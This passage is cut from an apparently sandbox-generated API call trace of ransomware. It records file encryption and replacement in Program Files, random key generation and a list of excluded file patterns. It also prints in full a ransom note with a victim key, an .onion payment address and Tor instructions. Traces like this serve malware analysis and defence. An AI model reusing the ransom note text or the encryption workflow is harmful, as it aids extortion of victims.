lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.737] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui")) returned 0x20 [0160.737] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.737] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 1 [0160.738] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui")) returned 0 [0160.738] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" [0160.738] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 1 [0160.738] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\.xXE73B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\.xxe73b.tmp")) returned 0xe73b [0160.739] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\.xXE73B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\.xxe73b.tmp"), dwFlags=0x1) returned 0 [0160.739] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\.xXE73B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\.xxe73b.tmp")) returned 1 [0160.739] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0160.740] wcslen (_String="OK") returned 0x2 [0160.740] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.740] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.740] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0160.740] CryptDestroyHash (hHash=0x9ad738) returned 1 [0160.740] CryptReleaseContext (hProv=0x8e3990, dwFlags=0x0) returned 1 [0160.740] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.740] GetLastError () returned 0x12 [0160.740] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0160.740] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.740] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.741] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.741] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.741] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.741] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.exe") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.dll") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.lnk") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.bat") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.ini") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.msi") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*.scf") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*pagefile.sys*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*AppData*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\winrar\\*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\java\\*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\windows\\*") returned 0 [0160.741] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\ESET\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\AVG\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*Atheros*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*Realtek*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*bootmgr*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*boot*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*boot*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*IO.SYS*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*ntldr*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*chrome*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*opera*") returned 0 [0160.742] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", pszSpec="*firefox*") returned 0 [0160.742] wcslen (_String="\\\\?\\") returned 0x4 [0160.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad578 [0160.742] wcscmp (_String1=".", _String2=".") returned 0 [0160.742] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.742] wcscmp (_String1="..", _String2=".") returned 1 [0160.742] wcscmp (_String1="..", _String2="..") returned 0 [0160.742] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.742] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.743] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.743] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.743] strlen (_Str="NMoreira") returned 0x8 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.743] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.744] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.745] CryptGenRandom (in: hProv=0x8bf310, 